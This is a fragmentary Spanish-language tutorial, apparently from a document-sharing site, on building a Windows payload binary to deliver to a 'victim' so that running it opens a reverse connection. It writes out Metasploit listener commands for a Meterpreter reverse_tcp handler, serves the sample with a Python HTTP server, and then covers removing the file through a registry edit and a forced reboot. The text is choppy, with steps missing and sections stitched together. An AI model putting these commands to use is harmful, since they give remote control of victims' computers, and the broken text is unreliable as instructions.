Documentos de Académico
Documentos de Profesional
Documentos de Cultura
Objetivos
Para este ataque construiremos un payload mediante un binario que será entregado
a la víctima. Al ejecutarse el binario se generará una conexión reversa.
Nota
msfconsole
Como siguiente punto es necesario iniciar un listener en metasploit, el cual recibirá
las conexiones en reversa y seleccionar el mismo payload que fue utilizado para
crear la muestra, mediante el siguiente comando:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
exploit -j
2. Entrega de la muestra
python -m SimpleHTTPServer 80
El comando exploit -j iniciará un socket de conexiones en reversa. Cuando una
víctima ejecute la muestra en su computador se generará una conexión reversa.
Identificación de la arquitectura
regedit.exe
Establecer el campo información del valor de acuerdo al full path del archivo a
eliminar
\??\C:\muestra.exe
Editar el valor binario con ceros hasta completar la estructura del valor binario
Cerrar el regitro de windows y reiniciar la pc mediante
shutdown /r /t 0
Nota